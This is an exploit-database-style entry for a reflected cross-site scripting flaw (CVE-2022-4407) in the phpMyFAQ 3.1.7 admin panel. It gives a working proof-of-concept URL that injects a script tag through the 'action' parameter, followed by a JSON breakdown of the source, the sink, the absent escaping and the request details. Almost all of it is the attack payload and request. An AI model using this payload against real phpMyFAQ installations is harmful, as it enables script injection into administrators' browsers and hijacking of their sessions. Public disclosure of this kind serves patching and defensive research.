# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407

PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>

Details:
{
    "Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
    "Vulnerable Variable": "action",
    "Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
    "Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
    "Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
    "Attack Payload": "\"><script>alert('XSS')</script>",
    "Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
    "Request Parameters": "action",
    "Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
    "Request Method": "GET",
    "Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}

[Replace Your Domain Name]